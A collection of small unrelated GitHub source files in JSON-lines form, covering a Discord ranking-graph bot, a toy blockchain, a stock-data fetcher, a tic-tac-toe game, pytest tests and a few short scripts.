@commands.command(brief=\"Lấy danh sách các bài vừa làm\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def stalk(self, ctx, *args):\n \"\"\"\n Top 10 bài vừa làm gần nhất.\n Ví dụ ;voj stalk CKQ\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n problem_list = RankingDb.RankingDb.get_info_solved_problem(handle)\n problem_list = list(filter(lambda x: x[1] == 'AC' or (float(x[1]) >= 100 - 0.1), problem_list))\n problem_list = list(filter(lambda x: filt.filter(datetime.strptime(x[2], '%Y/%m/%d')), problem_list))\n if len(problem_list) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n problem_list = sorted(problem_list, key=lambda x: x[2], reverse=True)[:10]\n problem_list = list(map(lambda x: (RankingDb.RankingDb.get_problem_info(x[0]), x[1], x[2]), problem_list))\n\n msg = ''\n for p in problem_list:\n msg += to_message(p) + '\\n'\n title = \"Các bài vừa được giải bởi \" + handle\n\n embed = discord.Embed(title=title, description=msg)\n await ctx.send(embed=embed)\n\n def get_rating_change(self, handle):\n # problem id, result, date\n raw_subs = RankingDb.RankingDb.get_info_solved_problem(handle)\n raw_subs = list(filter(lambda x: (x[1] == 'AC') or (float(x[1]) > 0.01), raw_subs))\n raw_subs = sorted(raw_subs, key=lambda x: x[2])\n problem_points = common.get_problem_points()\n rating_changes = [(-1, -1)]\n rating = 0\n for problem_name, result, date in raw_subs:\n if rating_changes[-1][1] != date:\n rating_changes.append((0, date))\n if result == 'AC':\n result = 100\n rating += problem_points[problem_name] * float(result) / 100\n # rating += 2 * float(result) / 100\n rating_changes[-1] = (rating, date)\n return rating_changes[1:]\n\n @commands.command(brief=\"Hiện phân phối điểm\")\n async def distrib(self, ctx):\n \"\"\"\n Hiện phân phối điểm của các bài tập.\n \"\"\"\n bin_size = 0.2\n bins = 10\n\n height = [0] * bins\n problem_points = common.get_problem_points()\n for p, point in problem_points.items():\n height[min(bins - 1, int(point // bin_size))] += 1\n x = [k * bin_size for k in range(bins)]\n label = ['{:.2f} ({})'.format(r, c) for r,c in zip(x, height)]\n colors = []\n for rank in badge.RATED_RANKS:\n colors.append('#' + '%06x' % rank.color_embed)\n colors = colors[:bins]\n assert len(colors) > 0, 'Expected colors len is greater than 0'\n while len(colors) < bins:\n colors.append(colors[-1])\n \n plt.clf()\n plt.xlabel('Point')\n plt.ylabel('Number of problems')\n plt.xticks(rotation=45)\n plt.bar(x, height, bin_size*0.9, color=colors, tick_label=label)\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title=\"Phân phối điểm của bài tập VOJ\")\n discord_common.attach_image(embed, discord_file)\n # discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n @commands.command(brief=\"Hiện historgram về thời gian làm bài\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def hist(self, ctx, *args):\n \"\"\"Hiện histogram về thời gian làm bài của handle cho trước.\n Ví dụ ;voj hist CKQ d<16022020 d>=05062019\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n raw_subs = RankingDb.RankingDb.get_info_solved_problem(handle)\n raw_subs = list(filter(lambda x: filt.filter(\n datetime.strptime(x[2], '%Y/%m/%d')), raw_subs))\n if len(raw_subs) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n subs = []\n types = ['AC', 'IC', 'PC']\n solved_by_type = {'AC': [], 'IC': [], 'PC': []}\n cnt = 0\n plt.clf()\n plt.xlabel('Time')\n plt.ylabel('Number solved')\n for problem_name, point, date in raw_subs:\n t = 'AC'\n if point <= 0 + 0.01:\n t = 'IC'\n elif point < 100 - 0.01:\n t = 'PC'\n solved_by_type[t].append(date)\n\n all_times = [[datetime.strptime(date, '%Y/%m/%d')\n for date in solved_by_type[t]] for t in types]\n labels = ['Accepted', 'Incorrect', 'Partial Result']\n colors = ['g', 'r', 'y']\n plt.hist(all_times, stacked=True, label=labels, bins=34, color=colors)\n total = sum(map(len, all_times))\n plt.legend(title=f'{handle}: {total}',\n title_fontsize=plt.rcParams['legend.fontsize'])\n\n plt.gcf().autofmt_xdate()\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Số bài làm theo thời gian.')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n\n @commands.command(brief=\"Hiện histogram của toàn group.\",\n usage='[d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def group_hist(self, ctx, *args):\n \"\"\"Hiện histogram của toàn group.\n Ví dụ ;voj group_hist d<16022020 d>=05062019\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n\n solved_info = RankingDb.RankingDb.get_table(RankingDb.SUBMISSION_TABLE)\n raw_subs = list(map(lambda x: (x['problemName'], x['point'], x['timestamp']), solved_info))\n\n raw_subs = list(filter(lambda x: filt.filter(datetime.fromtimestamp(x[2])), raw_subs))\n if len(raw_subs) == 0:\n await ctx.send('Không tìm thấy submission với các tham số hiện tại.')\n return\n subs = []\n types = ['AC', 'IC', 'PC']\n solved_by_type = {'AC': [], 'IC': [], 'PC': []}\n cnt = 0\n plt.clf()\n plt.xlabel('Time')\n plt.ylabel('Number solved')\n for problem_name, point, timestamp in raw_subs:\n t = 'AC'\n if point <= 0 + 0.01:\n t = 'IC'\n elif point < 100 - 0.01:\n t = 'PC'\n solved_by_type[t].append(datetime.fromtimestamp(timestamp))\n\n all_times = [[date for date in solved_by_type[t]] for t in types]\n labels = ['Accepted', 'Incorrect', 'Partial Result']\n colors = ['g', 'r', 'y']\n plt.hist(all_times, stacked=True, label=labels, bins=34, color=colors)\n total = sum(map(len, all_times))\n plt.legend(\n title=f'VNOI Group: {total}', title_fontsize=plt.rcParams['legend.fontsize'])\n\n plt.gcf().autofmt_xdate()\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Số bài làm theo thời gian.')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n\n @commands.command(brief=\"Hiện biểu đồ kinh nghiệm\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def exp(self, ctx, *args):\n \"\"\"\n Hiện biểu đồ kinh nghiệm của handle cho trước.\n Ví dụ ;voj exp CKQ d<16022020 d>=05062019\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n if badge.MAX_SCORE == None:\n await ctx.send('Ranking chưa được tính, ping Cá Nóc.')\n return\n resp = self.get_rating_change(handle)\n resp = list(filter(lambda x: filt.filter(\n datetime.strptime(x[1], '%Y/%m/%d')), resp))\n if len(resp) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n plt.clf()\n _plot_rating([resp], MAX_SCORE=badge.MAX_SCORE)\n current_rating = resp[-1][0]\n current_badge = badge.point2rank(current_rating, badge.MAX_SCORE)\n rank_title = current_badge.title + \" {:.3f}\".format(current_rating)\n labels = [f'\\N{ZERO WIDTH SPACE}{handle} ({rank_title})']\n plt.legend(labels, loc='upper left')\n min_rating = current_rating\n max_rating = current_rating\n for rating, date in resp:\n min_rating = min(min_rating, rating)\n max_rating = max(max_rating, rating)\n max_rating = max(max_rating + 0.5 * badge.MAX_SCORE / 100, min(100, current_badge.high + 0.1) * badge.MAX_SCORE / 100)\n min_rating -= 0.5 * badge.MAX_SCORE / 100\n if min_rating < 0:\n min_rating = 0\n plt.ylim(min_rating, max_rating)\n msg = \"\"\n if current_badge.high < 100:\n upper_bound = current_badge.high * badge.MAX_SCORE / 100\n nxt_badge = badge.point2rank(upper_bound + 0.0001, MAX_SCORE=badge.MAX_SCORE)\n msg = \"`{}` cần khoảng {:.2f} exp nữa để có badge {} <:orz:661153248186597386>\".format(\n handle, upper_bound - current_rating, nxt_badge.title\n )\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Biểu đồ kinh nghiệm trong group VNOI.')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(msg, embed=embed, file=discord_file)\n\ndef setup(bot):\n bot.add_cog(Graph(bot))\n","repo_name":"leduythuccs/VOJ-ranking-bot","sub_path":"cogs/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":15224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26945104509","text":"import sys\nimport pandas as pd\nimport numpy as np\n\ndef read_file():\n try:\n file_content = pd.read_csv(sys.argv[1], header=None)\n except:\n sys.exit(\"file doesn't exist\")\n nb_thetas = file_content.shape[0]\n tmp = file_content.iloc[0 : nb_thetas, :]\n to_ret = np.array(tmp.values, dtype=float)\n return (to_ret, nb_thetas)\n\ndef main():\n thetas, nb_thetas = read_file()\n if ((len(sys.argv) - 1) < nb_thetas):\n sys.exit(\"need more features\")\n result = thetas[0][0]\n i = 1\n while (i < nb_thetas):\n result += thetas[i][0] * float(sys.argv[(i + 1)])\n i += 1\n print(result)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"msukhare/linear_reg_normal_equation","sub_path":"appli_linear_reg.py","file_name":"appli_linear_reg.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22455107153","text":"N = int(input())\n\nn_list=list(map(int, input().split()))\n\nleft = [1 for i in range(N)]\nright = [1 for i in range(N)]\n\ndef find():\n for i in range(N):\n for j in range(i):\n if n_list[i] > n_list[j] and left[i] < left[j]+1:\n left[i] = left[j] + 1\n if n_list[N-1-i] > n_list[N-1-j] and right[N-1-i] < right[N-1-j]+1:\n right[N-1-i] = right[N-1-j]+1\n\nfind()\nl_max = max(left)\nindex = left.index(l_max)\n\nif index == N-1:\n print(l_max)\nelif l_max == 0:\n print(max(right))\nelse:\n r_max = 0\n for i in right[index+1:]:\n if r_max < i and i 3:\n print(\"Inputed row is not valid, must be 1 - 3\")\n break\n if col < 1 or col > 3:\n print(\"Inputed column is not valid, must be 1 - 3\")\n break\n\n #fixing the spot\n self.fix_spot(row - 1, col - 1, player)\n\n # checking whether current player has won or not\n if self.is_player_win(player):\n print(f\"Player {player} wins the game!\")\n break\n\n # checking whether the game is draw or not\n if self.is_board_filled():\n print(\"Match Draw!\")\n break\n\n #swap turns\n player = self.swap_player_turn(player)\n \n # show final view\n print()\n self.show_board\n\n# start the game\ntic_tac_toe = TicTacToe()\ntic_tac_toe.start()\n","repo_name":"aqtlol/tictactoe","sub_path":"src/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13034966601","text":"import os\nimport pytest\n\nfrom multiplexer import multiplex_files\n\n\ndef write_file(tmp_path, filename, content):\n filename = os.path.join(tmp_path, filename)\n with open(filename, 'w') as file:\n for line in content:\n file.write(line + '\\n')\n return filename\n\n\n@pytest.fixture\ndef file_with_numbers(tmp_path):\n filename = 'file_with_numbers'\n content = ['1', '2', '3']\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_letters(tmp_path):\n filename = 'file_with_letters'\n content = ['A', 'B', 'C', 'D']\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_symbols(tmp_path):\n filename = 'file_with_symbols'\n content = ['-', '+']\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_one_line(tmp_path):\n filename = 'file_with_one_line'\n content = ['line', ]\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef empty_file(tmp_path):\n filename = 'empty_file'\n content = ['', ]\n return write_file(tmp_path, filename, content)\n\n\n@pytest.fixture\ndef file_with_empty_lines(tmp_path):\n filename = 'file_with_empty_lines'\n content = ['', 'line1', '', 'line2']\n return write_file(tmp_path, filename, content)\n\n\ndef test_one_file(file_with_letters):\n filenames = [file_with_letters, ]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [['A'], ['B'], ['C'], ['D'], ['A']]\n\n\ndef test_multiple_files(file_with_numbers, file_with_letters, file_with_symbols):\n filenames = [file_with_numbers, file_with_letters, file_with_symbols]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [['1', 'A', '-'], ['2', 'B', '+'], ['3', 'C', '-'], ['1', 'D', '+'], ['2', 'A', '-']]\n\n\ndef test_file_with_one_line(file_with_one_line):\n filenames = [file_with_one_line, ]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [['line'], ['line'], ['line'], ['line'], ['line']]\n\n\ndef test_file_with_empty_lines(file_with_empty_lines):\n filenames = [file_with_empty_lines, ]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [[''], ['line1'], [''], ['line2'], ['']]\n\n\ndef test_empty_file(empty_file):\n filenames = [empty_file, ]\n generator = multiplex_files(filenames, infinite=False, loops=5)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [[''], [''], [''], [''], ['']]\n\n\ndef test_loops_number(file_with_one_line):\n filenames = [file_with_one_line, ]\n generator = multiplex_files(filenames, infinite=False, loops=10)\n extracted_values = [[i for i in j] for j in generator]\n assert extracted_values == [['line']] * 10\n\n\ndef test_no_file():\n try:\n filenames = ['file_not_exists', ]\n generator = multiplex_files(filenames, infinite=False, loops=10)\n extracted_values = [[i for i in j] for j in generator]\n except FileNotFoundError:\n pass\n","repo_name":"avasenin-148/intel","sub_path":"task_1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71260063529","text":"from financialNews.utils import util\n\ndef ashare_params(code):\n \"\"\"东方财富请求参数\"\"\"\n tmp = \"1.\" + code\n prms = {\n \"secid\": tmp,\n \"ut\": \"fa5fd1943c7b386f172d6893dbfba10b\",\n \"fields1\": \"f1,f2,f3,f4,f5,f6\",\n \"fields2\": \"f51,f52,f53,f54,f55,f56,f57,f58,f59,f60,f61\",\n # \"klt\": \"102\",\n \"klt\": \"101\",\n 'fqt': \"1\",\n \"end\": \"20500101\",\n 'lmt': \"120\",\n }\n result = \"\"\n for key, val in prms.items():\n result = result + key + \"=\" + val + \"&\"\n result = result[:-1]\n return result\n\ndef collect_ashare(code):\n server = \"http://3.push2his.eastmoney.com/api/qt/stock/kline/get\"\n params = ashare_params(code)\n url = server + \"?\" + params\n response = util.get_url(url)\n kline_data = response[\"data\"][\"klines\"]\n\n all_data = []\n for node in kline_data:\n arr = node.split(\",\")\n #all_data.append(arr[0:6])\n all_data.append([arr[0], arr[1], arr[3], arr[4], arr[2]])\n return all_data\n\nif __name__ == \"__main__\":\n code = \"000016\"\n ret = collect_ashare(code)\n print(ret)","repo_name":"leeewl/financialNews","sub_path":"financialNews/core/finance/eastmoney.py","file_name":"eastmoney.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30448673592","text":"\"\"\"\nA nota final de um estudante é calculada a partir de três notas atribuídas entre o intervalo de 0 até 10, respectivamente,\na um trabalho de laboratório, a uma avaliação semestral e a um exame final. A média das três notas mencionadas anteriormente\nobedece aos pesos: Trabalho de Laboratório: 2; Avaliação Semestral: 3, Exame Final : 5. De acordo com o resultado, mostre na\ntela se o aluno está reprovado (média entre 0 a 2,9 ) de recuperação (3 entre 4,9) ou se foi aprovado. Faça todas as veri-\nficações necessárias.\n\"\"\"\n\nwhile True:\n grade = input(\"Digite a nota do exame final : \")\n work_school = input(\"Digite a nota do trabalho : \")\n semiannual_evaluation = input(\"Digite a nota do exame semestral : \")\n try:\n grade = float(grade); work_school = float(work_school); semiannual_evaluation = float(semiannual_evaluation)\n except:\n print(\"Digito inválido.\")\n finally:\n if grade < 0 or grade > 10:\n print(\"Nota do exame final deve estar entre 0 e 10.\")\n elif work_school < 0 or work_school > 10:\n print(\"Nota do trabalho deve estar entre 0 e 10.\")\n elif semiannual_evaluation < 0 or semiannual_evaluation > 10:\n print(\"Nota do exame semestral deve estar entre 0 e 10.\")\n else:\n weighted_average = ((grade * 5 ) + (work_school * 2) + (semiannual_evaluation * 3)) / 10\n if weighted_average > 0 and weighted_average <= 2.9:\n print(f'Média {weighted_average}, aluno está reprovado.')\n elif weighted_average >= 3 and weighted_average <= 4.9:\n print(f'Média {weighted_average}, aluno está recuperação.')\n else:\n print(f'Média {weighted_average}, aluno está Aprovado.')\n print(\"Deu certo\")\n ","repo_name":"linikerunk/python-as-well","sub_path":"geek-universe/GeekExercise/Section 5/exe14.py","file_name":"exe14.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571015025","text":"from unittest import TestCase\n\nfrom util.asynchttppost import AsyncHttpPost\n\n\nclass TestAsyncHttpPost(TestCase):\n def test_post(self):\n try:\n in_file = \"../../data/requests/Mixed-modalities.json\"\n\n url = \"http://127.0.0.1:8080/geminiml/predict\"\n headers = {'Content-type': 'application/json'}\n async_http_post = AsyncHttpPost(url, headers)\n responses = async_http_post.post_batch(in_file)\n print(str(responses))\n except Exception as e:\n print(str(e))\n self.fail()\n","repo_name":"patrick-nicolas/GenModels","sub_path":"src/util/test/test_asynchttppost.py","file_name":"test_asynchttppost.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29802774899","text":"import hashlib\n\nfrom proof import proof\nfrom transaction.transaction import Transaction\nfrom transaction import signature\n\n\nWORK_FACTOR = 5\nSEED_COIN_SUPPLY = 21000000\n\n\n\nclass Blockchain(object):\n\n def __init__(self, transactions=None):\n \"\"\"Creates blockchain from given seed transactions\"\"\"\n\n self.blocks = []\n if transactions:\n if type(transactions) is not list:\n raise Exception(\"Data must be a list of transactions!\")\n\n for i, tx in enumerate(transactions):\n if i == 0: # Create genesis block\n if not signature.verify(tx.from_pk, tx.to_string_for_hashing(), tx.signature):\n print(\"Genesis transaction signature is NOT valid.\")\n return\n prev_hash = \"0\" # Arbitrary prev_hash for genesis block\n new_block = Block.create_from_transaction(tx, prev_hash)\n self.blocks.append(new_block)\n else:\n if not self.validate_transaction(tx):\n print(\"Transaction is NOT valid.\")\n return\n new_block = Block.create_from_transaction(tx, self.blocks[-1].header_hash)\n self.validate_and_add_block(new_block)\n\n def init_with_genesis_block(self, block):\n \"\"\"Creates blockchain from a Genesis block.\"\"\"\n\n genesis_tx = block.transactions # Genesis block contains single seed transaction from God\n\n if not signature.verify(genesis_tx.from_pk, genesis_tx.to_string_for_hashing(), genesis_tx.signature):\n print(\"Genesis transaction signature is NOT valid.\")\n return\n\n self.blocks.append(block)\n return self\n\n def add_transactions(self, transactions):\n \"\"\"Mines a new block that includes a set of given transaction(s).\"\"\"\n\n if not transactions:\n Exception(\"transactions cannot be empty!\")\n return\n\n if not type(transactions) == list:\n Exception(\"Transactions must be a sent in a list!\")\n return\n\n for i, tx in enumerate(transactions):\n if not self.validate_transaction(tx):\n return\n new_block = Block.create_from_transaction(tx, self.blocks[-1].header_hash)\n self.validate_and_add_block(new_block)\n\n def validate_and_add_block(self, block):\n \"\"\"Validates a block before adding to current chain.\"\"\"\n\n # 1. Validate transaction(s) in block\n tx = block.transactions\n if not self.validate_transaction(tx):\n print(\"Block contains invalid transactions.\")\n return\n\n # 2. Hash transaction(s)\n tx_hash = HashAssist.hash_value(value=tx.to_string_for_hashing())\n\n # 3. Validate header\n header_string = block.prev_hash + tx_hash + block.nonce\n header_hash = HashAssist.hash_value(header_string)\n if not block.header_hash == header_hash:\n print(\"Block header invalid!\")\n return\n\n self.blocks.append(block)\n\n def validate_transaction(self, tx, throw_exception=False):\n \"\"\"Validates a transaction's signature & amount\"\"\"\n\n # 1. Validate signature\n isValid = signature.verify(tx.from_pk, tx.to_string_for_hashing(), tx.signature)\n if not isValid:\n error_msg = \"Signature not valid!\"\n if throw_exception:\n print(error_msg)\n raise Exception(error_msg)\n else:\n print(error_msg)\n return False\n\n # 2. Validate sender balance\n balance = get_balance(tx.from_pk, self.blocks)\n if tx.amount > balance:\n error_msg = \"Insufficient funds for this transaction!\"\n if throw_exception:\n print(error_msg)\n raise Exception(error_msg)\n else:\n print(error_msg)\n return False\n return True\n\n def get_size(self):\n return len(self.blocks)\n\n def print_all_blocks(self):\n for block in self.blocks:\n block.print_block()\n\n def remove_data(self, data):\n raise Exception(\"This is the blockchain. No data shall be removed.\")\n\n\n\nclass Block(object):\n def __init__(self, header_hash, prev_hash, nonce, transactions_hash, transactions):\n self.header_hash = header_hash\n self.prev_hash = prev_hash\n self.nonce = nonce\n self.transactions_hash = transactions_hash\n self.transactions = transactions\n \n @staticmethod\n def create_from_transaction(tx, prev_hash):\n \"\"\"Creates and returns a new Block given a transaction.\"\"\"\n\n tx_hash = HashAssist.hash_value(tx.to_string_for_hashing())\n\n print(\"Mining nonce....\")\n nonce = proof.mint(prev_hash + tx_hash, WORK_FACTOR)\n header_hash = HashAssist.hash_value(prev_hash + tx_hash + nonce)\n\n return Block(header_hash, prev_hash, nonce, tx_hash, tx)\n\n def print_block(self):\n print(\"Block details....\")\n print(\"header_hash: %s\" % self.header_hash)\n print(\"prev_hash: %s\" % self.prev_hash)\n print(\"nonce: %s\" % self.nonce)\n print(\"transactions_hash: %s\" % self.transactions_hash)\n print(\"transactions: %s\" % self.transactions)\n print(\"_______________________________\")\n\n\n\nclass HashAssist(object):\n # TODO: Add any additional Hash assist functionality\n\n @classmethod\n def hash_value(self, value):\n h = hashlib.sha256()\n h.update(value.encode('utf-8'))\n return h.hexdigest()\n\ndef get_balance(pub_key, blocks):\n \"\"\"Returns unspent transaction balance for a given public key.\"\"\"\n \n balance = 0\n for block in blocks:\n if block.transactions.to_pk == pub_key:\n balance += block.transactions.amount\n if block.transactions.from_pk == pub_key:\n balance -= block.transactions.amount\n return balance\n\ndef validate_all_transactions_and_blocks(blockchain):\n \"\"\"Validates all transactions and blocks in a chain\"\"\"\n\n # 1. Recreate blockchain from scratch...\n new_blockchain = None\n\n # 2. ...which will run all necessary checks as it builds and adds blocks...\n i = 0\n for block in blockchain.blocks:\n if i == 0:\n new_blockchain = Blockchain().init_with_genesis_block(block)\n else:\n try:\n new_blockchain.validate_and_add_block(block)\n except:\n print(\"Blockchain contains invalid blocks!\")\n return False\n i += 1\n return True\n\ndef fork_choice(chainA, chainB):\n \"\"\"Returns the longest, valid chain given two choices.\n \n Note: This function assumes that chainA is node's current chain and has therefore already been validated.\n \"\"\"\n\n if not chainA:\n if validate_all_transactions_and_blocks(chainB):\n print(\"There's no ChainA, and ChainB is valid!\")\n return chainB\n elif chainB.get_size() > chainA.get_size():\n if validate_all_transactions_and_blocks(chainB):\n print(\"ChainB is longer and valid!\")\n return chainB\n return chainA\n\ndef create_god_transaction(to_pk):\n \"\"\"Creates first (\"God\") transaction in chain history using seed coins\"\"\"\n\n god_pk, god_sk = signature.generate_keys()\n tx = Transaction(god_pk, to_pk, SEED_COIN_SUPPLY)\n tx.sign(god_sk)\n return tx\n\n\n\nif __name__ == \"__main__\":\n\n pk, sk = signature.generate_keys()\n\n print(\"Firing up a new node!\")\n\n print(\"Your public key is:\")\n print(pk)\n\n print(\"Your secret key is:\")\n print(sk)\n\n # Generate God keys to create seed transaction\n god_pk, god_sk = signature.generate_keys()\n\n # Create two blockchains and implement fork choice\n new_blockchain = None\n for i in range(4):\n if not new_blockchain: # Must mine the Genesis node\n tx = Transaction(god_pk, pk, SEED_COIN_SUPPLY)\n tx.sign(god_sk)\n new_blockchain = Blockchain([tx])\n else:\n to_pk = input(\"Give seed money to:\")\n amount = int(input(\"Amount:\"))\n tx = Transaction(pk, to_pk, amount) # All transactions sent from God node\n tx.sign(sk)\n new_blockchain.add_transactions([tx])\n\n print(\"Creating second blockchain...\")\n\n new_blockchain_2 = None\n for i in range(3):\n if not new_blockchain_2: # Must mine the Genesis node\n tx = Transaction(god_pk, pk, SEED_COIN_SUPPLY)\n tx.sign(god_sk)\n new_blockchain_2 = Blockchain([tx])\n else:\n to_pk = input(\"Give seed money to:\")\n amount = int(input(\"Amount:\"))\n tx = Transaction(pk, to_pk, amount) # All transactions sent from God node\n tx.sign(sk)\n new_blockchain_2.add_transactions([tx])\n\n print(\"We now have TWO blockchains.\")\n print(\"Let's run a fork choice rule!\")\n\n if fork_choice(new_blockchain, new_blockchain_2) == new_blockchain_2:\n print(\"We should update our node's blockchain to blockchain 2!\")\n else:\n print(\"Our first blockchain was the longest, valid chain!\")\n\n\n # test balance function\n # for i in range(2):\n # search_pk = input(\"Get balance of public key:\")\n # balance = BlockAssist.get_balance(search_pk, new_blockchain.blocks)\n # print(balance)\n","repo_name":"stewartfortier/DumbCoin","sub_path":"blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":9408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22351980622","text":"#coding:utf-8\nimport re\nimport pickle\nimport time\ndate = time.strftime('%Y-%m-%d')\ntestfile=open(r\"dns201524.txt\")\nteststr=testfile.read()\ntestfile.close()\nd ={}\nreg=re.compile(r\"(\\w{5}-\\w*)\\s+Host\\s+\\(A\\)\\s+(172\\.17\\.\\d+\\.\\d+)\",re.M)\nmatchs=reg.finditer(teststr)\nwith open ('arp.dump','rb') as f:\n try:\n d = pickle.load (f)\n except EOFError:\n d={}\nf.close()\nfor i in matchs:\n IT_tag = i.group(1).strip(\" \")\n IP = i.group(2).strip(\" \")\n for key, info in d.items():\n if info[0] == IP:\n d[key][3] = IT_tag \n##for key, info in d.items():\n## print info\nf1 = open('arp.dump', 'wb')\npickle.dump(d, f1)\nf1.close()\n\n","repo_name":"ver007/python-script","sub_path":"assets_info/dns_search.py","file_name":"dns_search.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74920401769","text":"def getFinalList(l):\n res = [l]\n while True:\n prev = res[-1]\n temp = [prev.count(i) for i in prev]\n if prev == temp:\n break\n res.append(temp)\n # print(res)\n return res\n\ndef solve():\n n = int(input().strip())\n l = list(map(int, input().strip().split()))\n l = getFinalList(l)\n q = int(input().strip())\n for i in range(q):\n x,k = map(int,input().strip().split())\n k = min(k,len(l)-1)\n x-=1\n # print('k',k,'x',x)\n print(l[k][x])\n\nt = int(input().strip())\nfor i in range(t):\n # print('running ', i)\n solve()\n\n\n\"\"\"\nContests/CodeForces/751_Div2/DivineArray.py\n2\n7\n2 1 1 4 3 1 2\n4\n3 0\n1 1\n2 2\n6 1\n2\n1 1\n2\n1 0\n2 1000000000\n\n1\n2\n3\n3\n1\n2\n\n\n\"\"\"","repo_name":"astrixsanath14/repl.it","sub_path":"Contests/CodeForces/751_Div2/DivineArray.py","file_name":"DivineArray.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74162078888","text":"from starlette.routing import Route\n\nfrom actions.system_application import CreditCardSystem\n\nBASE_PATH = '/sistema'\n\n\nclass Router:\n\n @staticmethod\n def get_routes() -> list:\n return [\n Route(f'{BASE_PATH}/solicitacao/', CreditCardSystem.get_cc_applications, methods=['GET']),\n Route(f'{BASE_PATH}/solicitacao/', CreditCardSystem.insert_cc_application, methods=['POST']),\n Route(f'{BASE_PATH}/solicitacao/{{application_id}}', CreditCardSystem.get_one_application,methods=['GET']),\n Route(f'{BASE_PATH}/solicitacao/{{application_id}}', CreditCardSystem.delete_cc_application, methods=['DELETE'])\n ]\n","repo_name":"HumbertoChiesi/card-solicitation-web-app","sub_path":"backend_python_gypz/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2620602078","text":"class ServiceDebugger(object):\n __enable_debug = True\n\n @classmethod\n def set_debug(cls, enable=True):\n cls.__enable_debug = enable\n\n @classmethod\n def debug(cls, show_form=True, show_param=True, show_response=True, count_time=True, content_limit=100, disable=False):\n from flask import request\n from functools import wraps\n from datetime import datetime\n import traceback\n\n if not cls.__enable_debug:\n def empty_wrapper(func):\n return func\n return empty_wrapper\n\n def make_wrapper(func):\n @wraps(func)\n def wrapper(**kwargs):\n if not disable:\n print(\"-\" * 10)\n print(\"Service:{}\".format(func.__name__))\n if show_param:\n print(\"Param:\")\n for name in kwargs:\n val = kwargs[name]\n print(\"\\t{0}: {1}\".format(name, val))\n\n if show_form:\n print(\"FormData:\")\n for name in request.form:\n print(\"\\t{0}: {1}\".format(name, str(request.form.get(name))[:content_limit]))\n\n if count_time:\n start_time = datetime.now()\n print(\"StartTime:{}\".format(start_time))\n\n try:\n resp = func(**kwargs)\n except:\n print(traceback.format_exc())\n resp = \"\"\n traceback.print_exc()\n\n if not disable:\n if count_time:\n end_time = datetime.now()\n 